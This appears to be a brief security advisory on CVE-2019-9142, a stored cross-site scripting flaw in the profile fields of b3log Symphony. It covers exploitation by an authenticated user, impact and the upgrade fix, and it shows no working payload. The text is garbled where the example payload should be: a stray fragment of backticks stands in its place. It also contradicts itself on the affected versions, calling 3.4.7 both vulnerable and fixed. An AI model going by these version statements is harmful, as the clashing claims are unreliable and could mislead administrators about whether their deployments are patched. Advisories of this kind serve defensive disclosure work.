CVE-2019-9142

Vulnerability

The b3log Symphony (aka Sym) version 3.4.7 and earlier contains a stored cross-site scripting (XSS) vulnerability in the /processor/SettingsProcessor.java component. Specifically, the userIntro and userNickname fields are not sanitized before being stored and rendered, allowing arbitrary HTML or JavaScript injection [1][2]. Affected versions are all before v3.4.7.

Exploitation

To exploit, an attacker must have the ability to edit their own profile settings (i.e., be an authenticated user) or leverage an administrator action if the admin updates the user's description. The attacker submits a crafted payload (e.g., `) into the userIntro or userNickname` field via the web interface. No special network position is required beyond being able to log into the application.

Impact

Successful exploitation enables the attacker to execute arbitrary JavaScript in the context of another user's browser when that user visits a page that displays the attacker's profile (e.g., user list or profile page). This can lead to session hijacking, defacement, or redirection to malicious sites. The stored nature means the payload persists until manually removed.

Mitigation

The vulnerability is fixed in Symphony version 3.4.7. Users should upgrade to at least v3.4.7 to eliminate the flaw [1][2]. For deployments that cannot immediately upgrade, ensure that only trusted users can edit profile fields and consider applying input validation/sanitization manually, though no official workaround is provided.